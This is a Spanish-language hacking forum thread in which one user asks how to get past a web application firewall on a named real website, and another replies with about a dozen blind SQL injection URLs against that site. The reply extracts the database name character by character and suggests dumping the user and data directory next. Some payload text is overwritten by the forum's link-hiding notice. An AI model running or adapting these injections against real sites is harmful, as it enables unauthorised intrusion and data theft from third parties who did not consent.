comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como determinar que filtro utilizar para bypass WAF

  • 1 Respuestas
  • 1291 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 1v@n

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • JIMR
    • Ver Perfil
  • Skype: jaime981@hotmail.com
« en: Diciembre 26, 2013, 05:38:45 pm »
saludos comunidad

me encontre con esta web,  No tienes permisos para ver links. Registrate o Entra con tu cuenta
order by 27--

la cual  eh probado una serie de tecnicas de bypass para evadir el WAF pero hasta el momento no logro evadir si alguien puede aportar ayuda para descubrir  como evadir .

gracias...
« Última modificación: Septiembre 27, 2014, 09:52:07 am por Expermicid »

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #1 en: Diciembre 26, 2013, 11:22:41 pm »
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.

Código: MySQL
  1. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),1,1))=112# ->p
  2. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),2,1))=105# -> i
  3. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),3,1))=101# -> e
  4. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),4,1))=98# -> b
  5. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),5,1))=100# -> d
  6. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),6,1))=111# -> o
  7. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),7,1))=109# -> m
  8. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),8,1))=105# -> i
  9. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),9,1))=95# -> _
  10. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),10,1))=112# -> p
  11. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),11,1))=105# -> i
  12.  
  13. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),12,1))=101# -> e
  14. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta((No tienes permisos para ver links. Registrate o Entra con tu cuenta()),13,1))=98#
->b

Database: piebdomi_pieb

asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc



Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 4440
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
[SOLUCIONADO] Ayuda para encontrar "airdecrypt"

Iniciado por Typh0n

Respuestas: 2
Vistas: 3875
Último mensaje Enero 13, 2014, 07:11:18 am
por aika
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 339
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
[SOLUCIONADO] Desencriptacion de una imagen para extraer la imagen original

Iniciado por stuxnet13

Respuestas: 3
Vistas: 1263
Último mensaje Enero 07, 2016, 07:55:01 pm
por blackdrake
[SOLUCIONADO] ¿Algún método para jugar [LOL] en linux? Kali linux

Iniciado por RainelU

Respuestas: 9
Vistas: 1551
Último mensaje Enero 07, 2018, 01:24:54 am
por PikachuDorado